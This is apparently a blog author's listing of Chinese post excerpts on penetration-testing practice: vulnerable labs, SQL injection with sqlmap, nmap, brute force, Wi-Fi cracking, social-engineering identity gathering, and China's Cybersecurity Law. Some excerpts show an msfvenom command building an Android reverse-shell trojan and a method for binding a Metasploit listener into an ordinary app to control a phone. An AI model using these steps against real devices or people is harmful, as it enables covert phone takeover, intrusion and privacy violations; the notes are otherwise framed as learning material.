摘要: 写在前面 “如果你想搞懂一个漏洞,比较好的方法是:你可以自己先制造出这个漏洞(用代码编写),然后再利用它,最后再修复它”。 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你 阅读全文
posted @ 2024-10-16 17:12 ZapcoMan 阅读(168) 评论(0) 推荐(0) 编辑
摘要: 第一章 总 则 第一条 为了保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展,制定本法。 第二条 在中华人民共和国境内建设、运营、维护和使用网络,以及网络安全的监督管理,适用本法。 第三条 国家坚持网络安全与信息化发展并重,遵循积 阅读全文
posted @ 2024-10-09 18:53 ZapcoMan 阅读(85) 评论(0) 推荐(0) 编辑
摘要: 人,是网络安全全流程中最大的弱点。针对人的攻击往往有出奇不意的效果。而想要利用人的弱点进行攻击,那么对目标的信息收集与了解就是非常重要的了。这篇文章记录了一些常用的用于对人进行身份信息收集的技术。这些技术常被用于溯源取证、社工攻击。 0x00 社工分析中的身份信息收集 关于人的社工分析有很多维度的信 阅读全文
posted @ 2024-10-09 18:29 ZapcoMan 阅读(191) 评论(0) 推荐(0) 编辑
摘要: 下载需要的脚本 将MSF监听 捆绑进入正常的 APP 中以达到控制目标手机的目的 使用kail 虚拟机完成 整个的过程 下载脚本 git clone https://gitee.com/stemmm/apkhook520.git 进入脚本根目录 cd apkhook520\ ifconfig 查询 阅读全文
posted @ 2024-12-10 23:12 ZapcoMan 阅读(26) 评论(0) 推荐(0) 编辑
摘要: Burte Force(暴力破解)概述 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使* 用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统 阅读全文
posted @ 2024-10-26 23:35 ZapcoMan 阅读(253) 评论(0) 推荐(1) 编辑
摘要: 古典密码学 (一) 凯撒密码 恺撒密码 (Caesar Cipher) 又被称为 凯撒变换或者叫做变换密码。该密码是以凯撒大帝的名字命名的。 凯撒密码是一种替换加密,通过该明文中的所有字母都在字母表上向后或者向前移动固定数目替换为密文 例如 当偏移量为3的时候,字母A就会变成D,字母B就会被替换成E 阅读全文
posted @ 2024-10-13 14:36 ZapcoMan 阅读(110) 评论(0) 推荐(0) 编辑
摘要: 封神台 SQL注入 靶场 (猫舍)手动注入 靶场地址 http://pu2lh35s.ia.aqlab.cn/?id=1 使用脚本 可以直接使用sqlmap脚本 直接 对这个地址进行测试 不过这样实在是太没意思了 这里使用的是 sqlmap 二次开发的 sqlmapplus 脚本 sqlmap 也是 阅读全文
posted @ 2024-10-13 11:46 ZapcoMan 阅读(476) 评论(0) 推荐(4) 编辑
摘要: 常用命令 nmap 192.168.0.100(简单扫描) nmap 192.168.0.100/24(扫描目标地址所在的某个网段) nmap 192.168.0.0/24(扫描整个子网中的网络主机信息) nmap 192.168.1.1/24(在某个网段进行扫描) nmap -sP 192.168 阅读全文
posted @ 2024-10-12 01:00 ZapcoMan 阅读(186) 评论(0) 推荐(0) 编辑
摘要: 科学 代理 上网插件 自由海 谷歌商店 下载 或者去国内的 浏览器插件网站也可以找到 harkbar 懂得都懂 测试必备 Wappalyzer 一款可以知道网站使用的技术的插件 就算对方有cdn 一样可以检测出来 Heimdallr Heimdallr是一款致力于被动嗅探浏览器流量,提示高危资产指纹 阅读全文
posted @ 2024-10-12 00:43 ZapcoMan 阅读(76) 评论(0) 推荐(0) 编辑
摘要: 原理 身份证 前六位是行政区划代码(可知道ip和地址后查询到前六位),后八位为出生日期和生日三位顺序码 17位奇数男性偶数女性(这个很简单)最后一位为校验码 校验码是通过身份证前17位 计算出来的 计算方法是 将身份证前17为数字分别乘以不同系数 从第1-17位×7 9 10 5 8 4 2 1 6 阅读全文
posted @ 2024-10-10 12:31 ZapcoMan 阅读(156) 评论(0) 推荐(0) 编辑
摘要: 查看配置 show variables like '%general%'; mysql> show variables like '%general%'; + + + | Variable_name | Value | + + + | general_log | OFF | | general_lo 阅读全文
posted @ 2024-10-09 20:12 ZapcoMan 阅读(24) 评论(0) 推荐(0) 编辑
摘要: python 要生成 requirements文件 有两种情况 具有独立的虚拟环境 全局环境 具有独立的虚拟环境 pip freeze > requirements.txt 全局环境 安装 pip install pipreqs 在当前目录生成 pipreqs . --encoding=utf8 - 阅读全文
posted @ 2024-10-09 20:06 ZapcoMan 阅读(100) 评论(0) 推荐(0) 编辑
摘要: 使用 pyinstaller 来进行打包 pip install pyinstaller 可能需要全局 科学 代理上网 或者 修改 下载源地址 执行命令 图标path:C:\desktop\icon 文件path:C:\pycharm\project\bingdundun.exe 1、指定文件路径打 阅读全文
posted @ 2024-10-09 20:06 ZapcoMan 阅读(21) 评论(0) 推荐(0) 编辑
摘要: kali linux 自带 apache 服务 和 mysql 服务 # 启动 apache 服务 service apache2 start # 启动 mysql 服务 service mysql start 查看两 个服务的 状态 service apache2 status service m 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(52) 评论(0) 推荐(0) 编辑
摘要: Kali Linux 更新 一条命令搞定 sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(25) 评论(0) 推荐(0) 编辑
摘要: 本教程只能用于学习研究之用 任何未经他人允许的攻击行为都是违法行为 参考教程 https://www.youtube.com/davidbombal 准备 * kali linux 系统 这里使用的是虚拟机 * 一张可以开启监听模式的网卡 * 两张网卡使用那一张都可以 * 本教程使用的是 pytho 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(12) 评论(0) 推荐(0) 编辑
摘要: wpa-dictionary 用于 Wi-Fi 密码破解。 Linux 篇(推荐) 1. 安装 aircrack-ng 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装: sudo apt install aircrack-ng 2. 查看可用的无线网卡 使用命令:air 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(13) 评论(0) 推荐(0) 编辑
摘要: 学校想要手机序列号有什么用 学校想要手机序列号有什么用?有你的IMEI和手机号就可以翻译成MSISSD 这个在基站那里可以监听你所有通信和短信截取你所有的通讯数据包,当然学校是没有能力破解的,从学校的权限看 监听通话短信和破解你的通讯数据这不太可能,这是违法的,但是定位 监控通信行为和流量特征,把你 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(39) 评论(3) 推荐(0) 编辑
摘要: 一个查询IP地理信息和CDN提供商的离线终端工具 Nali 功能 支持多种数据库 纯真 IPv4 离线数据库 ZX IPv6 离线数据库 Geoip2 城市数据库 (可选) IPIP 数据库 (可选) ip2region 数据库 (可选) DB-IP 数据库 (可选) IP2Location DB3 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(24) 评论(0) 推荐(0) 编辑
摘要: docker 靶场 笔记 搜索 镜像容器 sudo docker search dvwa 查看所有镜像容器 docker ps -a 下载 指定的 镜像 并在后台启动 docker run -itd -p 虚拟机的端口:容器端口 --name=自定义镜像名 镜像名 docker run -itd - 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(10) 评论(0) 推荐(0) 编辑
摘要: 高效记忆的底层逻辑公式 把数字,文字,声音转换成图片后连接记忆 两个要点 转换 连接 什么是记忆? 记忆是个体经验在头脑中积累和保存的心理过程,是人脑对过去经验的反馈 记忆的过程 识记 > 保持 > 再现 记 --> 存储 忆 --> 复现 记忆的本质 是 连接 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(6) 评论(0) 推荐(0) 编辑
摘要: wpa-dictionary 用于 Wi-Fi 密码破解。 Linux 篇(推荐) 1. 安装 aircrack-ng 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装: sudo apt install aircrack-ng 2. 查看可用的无线网卡 使用命令:air 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(101) 评论(0) 推荐(0) 编辑
摘要: 生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.135.247 LPPRT=5555 进行文件传输: python3 -m http.server 启动 MSF 控制端 : msconsole 设置模块: use ex 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(40) 评论(0) 推荐(0) 编辑
摘要: 常见文件格式 十六进制 文件头 JPEG (jpg),FileHeader:FFD8FF PNG (png),FileHeader:89504E47 GIF (gif),FileHeader:47494638 TIFF (tif),FileHeader:49492A00 Windows Bitmap 阅读全文
posted @ 2024-10-09 19:30 ZapcoMan 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 安装 AWVS 笔记 配置安装 https://www.zwnblog.com/archives/kali-an-zhuang-awvs 根据这篇文章 配置并安装出来的 设定的账号和密码 账号:admi**sb.com 密码:Adm***3.com 访问 https://10.54.133.10:1 阅读全文
posted @ 2024-10-09 19:12 ZapcoMan 阅读(12) 评论(0) 推荐(0) 编辑
摘要: Nessus 安装 笔记 根据 https://www.zwnblog.com/archives/nessus-jie-shao-yu-an-zhuang#2.kali%E5%AE%89%E8%A3%85nessus 的步骤 做出来的而且已经完成了 用户名 admin 密码 admin Nessus 阅读全文
posted @ 2024-10-09 19:12 ZapcoMan 阅读(10) 评论(0) 推荐(0) 编辑
摘要: 第一次安装完成后 发现这里面啥都没有 所以 更新源 apt update 也做不到 这是因为 源是国外 由于有墙 所以连接不上 下面这个命令可以 切换更新源 termux-change-repo 切换源之后 安装ssh 服务 然后修改密码 并启动 ssh 服务 就可以使用其他 设备链接 手机了 pk 阅读全文
posted @ 2024-10-09 19:11 ZapcoMan 阅读(39) 评论(0) 推荐(0) 编辑